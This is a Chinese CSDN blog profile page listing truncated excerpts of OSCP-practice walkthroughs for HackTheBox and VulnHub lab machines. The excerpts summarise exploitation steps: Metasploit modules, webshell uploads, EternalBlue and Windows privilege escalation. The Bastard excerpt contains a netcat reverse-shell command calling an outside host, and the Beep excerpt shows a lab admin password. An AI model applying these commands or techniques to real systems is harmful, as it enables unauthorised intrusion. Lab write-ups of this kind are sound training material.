3 Bubble_zhu

尚未进行身份认证

暂无相关简介

等级
TA的排名 4k+

oscp——HTB——Optimum

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点,看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...

2020-05-25 17:26:38

oscp——HTB——Bastard

0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp

2020-05-20 20:40:32

oscp——HTB——Devel

0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21,由于我这里有一点问题,所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马,然后直接put上传msf监听,访问cs.aspx会弹回来一个shell

2020-05-19 15:55:00

oscp——HTB——Beep

0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞,下载下来,然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。...

2020-05-09 15:24:58

oscp——HTB——Popcorn

0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test,果断扫目录。拿到目录:http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test,phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件,并使用burp拦截,并且修改

2020-05-09 14:32:12

oscp——HTB——Legacy

0x00 前言乘着网好,赶紧做一做。难度入门 1级 (基本没啥难度)0x01 信息收集常规上nmap看了一下目标版本,这里是2003看到这里看到445以及版本,永恒之蓝没得跑了。0x02 usershell and rootshell可以直接开启msf,进行搜索search smb获取到shell首先是找到user.txt然后找到root.txt...

2020-04-26 15:25:05

oscp——HTB——Postman

0x00 前言这个是第一个做的hackthebox的机子,由于这个做出来的人数比较多,所以选择了这个,不知道难度怎么样,决定做一做。0x01 实验1.信息收集(端口)这里由于不掌技巧,所以扫描花费了很久。。。。这里可以看到开放了,22,80,6379,10000所以指定扫描一下2.攻击尝试2.1 端口攻击尝试这里肯定是要先考虑一下redis,毕竟有一个未授权访问然后redi...

2020-01-19 21:58:04

oscp——HTB—— Lame

0x00 前言vulnhub下载,搞环境搞的人心累,还不如试试HTB~难度入门 1级 (基本没啥难度)0x01 信息收集常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。0x02 usershell and rootshell我是做完之后回来写的,这里可以直接拿到两个flag看到samba,拿msf 看一下版本use auxiliary/scanner/smb/s...

2020-04-13 13:21:14

oscp——PRIMER: 1.0.1

0x00 目标资料43链接https://www.vulnhub.com/entry/primer-101,136/难度推荐 1Web——UserShell 1环境搭建VM0x01 信息收集IP端口0x02 Web——UserShell照例,访问一下Web的站点,看看是啥样子的。看到一个登录框,这里直接检测sql注入,可以看到是存在注入的。这里本来在test下...

2020-03-17 15:08:49

oscp——vulnhub目录总览

0x00 前言这里记录并且导航已经完成的vulnhub文章,不提供任何提示。0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。...

2020-03-16 16:12:28

oscp——vulnhub目录总览(提示&知识点总结)

0x00 前言这里记录并且导航已经完成的vulnhub文章,拥有提示以及&知识点总结0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。提示提示一:修改x-forwarded-for头提示二:ssh爆破提示三:sudo -l知识点越权ssh爆破凡是用户名相同,则密码很大概率相同sudo -...

2020-03-16 16:12:22

oscp——/dev/random: Pipe

0x00 目标资料42链接https://www.vulnhub.com/entry/devrandom-pipe,124/难度推荐 4Web——Webshell 2Webshell——Rootshell 2环境搭建VMbox0x01 信息收集IP端口0x02 Web——Webshell首先访问一下目标的Web页面,看到了是一个需要登录的地方。这里尝试使用pos...

2020-03-15 18:53:45

oscp——NullByte: 1

0x00 目标资料 41链接https://www.vulnhub.com/entry/nullbyte-1,126/难度推荐 4Web——Usershell 3Usershell——Rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell这里访问一下web照例扫一下目标的目录这里可以看到有一个phpmyadm...

2020-03-14 15:05:10

oscp——Tr0ll: 1

# 0x00 目标资料## 链接https://www.vulnhub.com/entry/tr0ll-1,100/## 难度推荐 5- 思路 2- Web80——UserShell 2- UserShell——Rootshel 1## 环境搭建- VM...

2020-03-12 18:02:09

oscp——Hell: 1

0x00 目标资料 39链接https://www.vulnhub.com/entry/hell-1,95/难度推荐 3环境搭建VMbox0x01 信息收集IP端口0x02 Web首先访问一下web页面对目标进行一下目录遍历,发现如下目录这里的manual是一个apache的默认目录personal内容如下还有一个robots.txt 文件访问一下这里访...

2020-03-03 19:20:53

oscp——SecOS: 1

0x00 目标资料 38链接https://www.vulnhub.com/entry/secos-1,88/难度推荐 3思路 1web——usershell 1usershell——rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell拿到之后,访问一下8081端口然后看到一个注册的界面,进行用户的注册,...

2020-03-01 20:30:56

oscp——Bot Challenges: RA1NXing Bots

0x00 目标资料 37链接https://www.vulnhub.com/entry/bot-challenges-ra1nxing-bots,52/难度推荐 3思路 1web——webshell 1.5webshell——rootshel 0.5环境搭建vmbox0x01 信息收集IPmasscan 192.168.124.1/24 --ping --rate 1...

2020-02-28 15:24:56

oscp——Kioptrix: Level 1.3 (#4)

0x00 目标资料 36链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/难度推荐 4思路 1端口 0.5web——usershell 1usershell——rootshell 1.5环境搭建VMware下载下来之后是一个vmdx的文件,所以要经过处理这里新建一个虚拟机,选择其他移除原来的硬盘加载下...

2020-02-28 13:54:02

oscp——xerxes-1

0x00 目标资料 35链接https://www.vulnhub.com/entry/xerxes-1,58/难度推荐 4思路 1环境搭建vmbox0x01 信息收集IP masscan 192.168.124.1/24 --ping --rate 1000000000000000000000000000000端口nmap -A 192.168.124.15...

2020-02-28 13:52:36

oscp——Hackademic: RTB2

0x00 前言这是第34台机子啦。0x01 信息收集0x02 Web80——webshell访问一下80端口的内容这里使用万能密码进行绕过,获取到秘钥先进行一个url的解码然后进行ascii解码先将空格去除00110001 00110000 00110000 00110001 00111010 00110001 00110001 ...

2020-02-22 10:15:08

查看更多

勋章 我的勋章
  • GitHub
    GitHub
    绑定GitHub第三方账户获取
  • 签到达人
    签到达人
    累计签到获取,不积跬步,无以至千里,继续坚持!
  • 新人勋章
    新人勋章
    用户发布第一条blink获赞超过3个即可获得
  • 阅读者勋章Lv2
    阅读者勋章Lv2
    授予在CSDN APP累计阅读博文达到7天的你,是你的坚持与努力,使你超越了昨天的自己。
  • 专栏达人
    专栏达人
    授予成功创建个人博客专栏的用户。专栏中添加五篇以上博文即可点亮!撰写博客专栏浓缩技术精华,专栏达人就是你!
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 学习力
    学习力
    《原力计划【第二季】》第一期主题勋章 ,第一期活动已经结束啦,小伙伴们可以去参加第二期打卡挑战活动获取更多勋章哦。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 分享精英
    分享精英
    成功上传11个资源即可获取